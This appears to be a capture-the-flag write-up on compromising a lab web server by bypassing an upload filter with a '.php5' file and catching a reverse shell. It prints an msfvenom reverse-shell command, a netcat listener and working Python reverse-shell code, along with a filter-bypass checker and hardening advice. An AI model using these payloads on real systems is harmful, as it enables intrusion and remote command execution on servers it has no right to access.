To be honest, I even liked it more than my previous favorite, "Active". The "theme" of this box was tunneling, in the several forms it appears. It was a great learning experience for me; I especially learned a lot about netcat and networking in general.

So, let's start with the obvious first step: nmap.

```
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

SSH is not a very good initial attack vector in most cases, so let's take a look at port 80. Just browsing to the root directory gives us some text: "We are proud to announce our first client: Sparklays". We COULD boot up dirbuster (or similar) and try to bruteforce the subdirectories, but why not go with what's presented to us? Browsing to /slowdaddy leaves us with a 404, but /sparklays gives us a 403. That means /slowdaddy does not exist, but /sparklays does; Apache just refuses to show us the directory itself (a 403 on a directory without an index file usually means directory listing is disabled), so we have to guess what is inside. This gives us a starting point to bruteforce, and if we do, we quickly find the subdirectory /sparklays/design with the pages /sparklays/design/design.html and /sparklays/design/changelogo.php, as well as the subdirectory /sparklays/design/uploads.

If we browse to /sparklays/design/changelogo.php, we find an option to upload files. The experienced hacker will instantly know that this is a possible vector, with the possibilities of uploading webshells, reverse shells or other malicious files. Trying to upload a file like "my_shell.php" results in the website responding with "sorry that file type is not allowed" ("I'm sorry, Dave, I can't let you do that"). With some knowledge about bypassing such upload filters we eventually get to upload a file called "my_shell.php5". The check rejects ".php" but not ".php5", and that is enough: the Apache/2.4.18 (Ubuntu) banner is Ubuntu 16.04, whose stock mod_php configuration (php7.0.conf) hands every file matching `.+\.ph(p[3457]?|t|tml)$` to the PHP interpreter, so ".php3", ".php4", ".php5", ".php7", ".pht" and ".phtml" all run as PHP.

The only thing left now is to set up a listener (e.g. netcat or Metasploit's exploit/multi/handler) and execute the uploaded file somehow to get a shell. (The listener obviously becomes obsolete if we go with a webshell instead of a reverse shell.) For this, we can take a step back and try the obvious first: /sparklays/design/uploads seems like a directory that could potentially contain the uploaded files, so /sparklays/design/uploads/my_shell.php5 should do what we want (spoiler alert: it does).

Let's just go over some of the details of what just happened. First, we created a malicious PHP file that grants us a shell. We can write our own shellcode, pull it from exploit-db or just generate it using msfvenom. It's definitely a good skill to be able to write your own shellcode, but depending on what you want to achieve, the immense convenience that tools like msfvenom provide should not be neglected either. For a reverse shell, a command like this creates a payload that can be caught with netcat:

```
msfvenom -p php/reverse_php -f raw LHOST=<our IP> LPORT=<port> > my_shell.php5
```

- `-p php/reverse_php` specifies which payload we want to use, in this case a simple reverse shell.
- `-f raw` specifies the format of the shellcode; in this case we just want the raw PHP code.
- `LHOST=` specifies which IP the shell should connect to, which means we have to put our own IP here, and it has to be one the target can actually reach (over a VPN that is the address of the tunnel interface, not our LAN address).
- `LPORT=` specifies the port to connect to, on which we later have to listen.
- As msfvenom normally prints the result to stdout, `> my_shell.php5` conveniently redirects the output into a file called "my_shell.php5" for us to use.

We can set up our netcat listener like this:

```
nc -lvp <port>
```

The parameters just mean: listen (`-l`), with verbose output (`-v`), on port (`-p`). The port must be the same one we put into LPORT.
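Why the ".php5" upload got through while ".php" did not, as an added example (not code from the original post or from the box): the upload check is assumed to be a plain extension blocklist, and the Apache handler pattern is the stock one from Ubuntu 16.04's php7.0.conf. The candidate filenames are constructed. The script contrasts the weak check with an allowlist check and lists which names would still be executed by Apache under each.

```python
import re

# Constructed example: why "my_shell.php5" got past the upload check and
# still ran as PHP. Not the box's real code; the filter is assumed.

# The upload check as the post describes it: ".php" is rejected, ".php5" is
# not. Assumed here to be a plain extension blocklist.
NAIVE_BLOCKLIST = {".php"}

# Stock mod_php handler on Ubuntu 16.04 (/etc/apache2/mods-available/php7.0.conf):
#   <FilesMatch ".+\.ph(p[3457]?|t|tml)$">  SetHandler application/x-httpd-php
# Anything matching this is executed, whatever the upload filter thought of it.
APACHE_PHP_HANDLER = re.compile(r".+\.ph(p[3457]?|t|tml)$", re.IGNORECASE)

# What a hardened check for a logo upload should accept: a short allowlist.
IMAGE_ALLOWLIST = {"png", "jpg", "jpeg", "gif"}


def naive_filter_allows(filename: str) -> bool:
    """The weak check: reject only the extensions on the blocklist."""
    dot = filename.rfind(".")
    ext = filename[dot:].lower() if dot != -1 else ""
    return ext not in NAIVE_BLOCKLIST


def apache_executes_php(filename: str) -> bool:
    """Would mod_php run this file once it sits in a web-served directory?"""
    return APACHE_PHP_HANDLER.match(filename) is not None


def hardened_filter_allows(filename: str) -> bool:
    """Allowlist check on the whole name: exactly one dot, and the part after
    it must be an image extension. 'x.php.jpg' is rejected too, because
    configurations that map PHP with AddHandler (instead of an anchored
    FilesMatch) treat every extension in the name and would execute it."""
    base, dot, ext = filename.rpartition(".")
    return dot == "." and base != "" and "." not in base and ext.lower() in IMAGE_ALLOWLIST


def find_bypasses(candidates, allows):
    """Names that pass a given upload check AND would be executed by Apache."""
    return [name for name in candidates if allows(name) and apache_executes_php(name)]


# Constructed candidate names an attacker would try against the upload form.
CANDIDATES = [
    "my_shell.php", "my_shell.php3", "my_shell.php4", "my_shell.php5",
    "my_shell.php7", "my_shell.pht", "my_shell.phtml", "my_shell.phar",
    "my_shell.php.jpg", "my_shell.jpg", "logo.png",
]

if __name__ == "__main__":
    print("bypasses naive filter:   ", find_bypasses(CANDIDATES, naive_filter_allows))
    print("bypasses hardened filter:", find_bypasses(CANDIDATES, hardened_filter_allows))
```

The allowlist is only half of the fix: the uploaded file should also be stored outside the document root (or served from a directory where the PHP handler is disabled), so that a filter mistake does not turn into code execution.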
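The listener and the connect-back side described above, as an added example (not code from the original post, and not Metasploit's php/reverse_php): both halves of a reverse shell, written in Python and run against each other on localhost so the whole exchange works offline. `start_listener`/`run_remote` play the role of `nc -lvp <port>`, `connect_back` does what the uploaded payload does. The prompt-after-output convention and the names are my own; the commands run are constructed.

```python
import socket
import subprocess
import threading

# Constructed example: a reverse shell's two halves talking over localhost.
# Not the post's payload or netcat; the prompt convention is a simplification
# so the operator knows when one command's output is complete.

PROMPT = b"$ "


def start_listener(host="127.0.0.1", port=0):
    """nc -lvp equivalent: bind LHOST:LPORT and wait for the connect-back.
    port=0 lets the OS pick a free port; the chosen port is returned so the
    payload (LPORT) can be built to match."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def connect_back(lhost, lport):
    """Payload side: connect to LHOST:LPORT, run every line received as a
    shell command, send stdout+stderr followed by a prompt. Stops on 'exit'
    or when the listener hangs up."""
    s = socket.create_connection((lhost, lport))
    try:
        for line in s.makefile("rb"):
            cmd = line.decode(errors="replace").strip()
            if cmd in ("", "exit"):
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
            s.sendall(proc.stdout + proc.stderr + PROMPT)
    finally:
        s.close()


def run_remote(conn, cmd, timeout=10):
    """Operator side: send one command and read until the prompt comes back."""
    conn.settimeout(timeout)
    conn.sendall(cmd.encode() + b"\n")
    buf = b""
    while not buf.endswith(PROMPT):
        chunk = conn.recv(4096)
        if not chunk:  # payload closed the connection
            return buf.decode(errors="replace")
        buf += chunk
    return buf[:-len(PROMPT)].decode(errors="replace")


def demo(commands):
    """Full round trip on localhost: listen, let the 'target' connect back,
    run each command, collect the outputs, then tell the payload to exit."""
    srv, port = start_listener()
    target = threading.Thread(target=connect_back, args=("127.0.0.1", port), daemon=True)
    target.start()
    srv.settimeout(10)
    conn, _addr = srv.accept()  # this is the moment netcat prints "connect to ..."
    try:
        return [run_remote(conn, c) for c in commands]
    finally:
        conn.sendall(b"exit\n")
        conn.close()
        srv.close()
        target.join(timeout=10)


if __name__ == "__main__":
    for out in demo(["echo hello from the target", "id"]):
        print(out, end="")
```

In a real engagement the two halves are on different hosts, so the address the payload gets as LHOST must be one the target can route to (over a VPN, the tunnel interface's address) and the port must match what the listener binds; if nothing arrives, checking those two first is faster than debugging the payload.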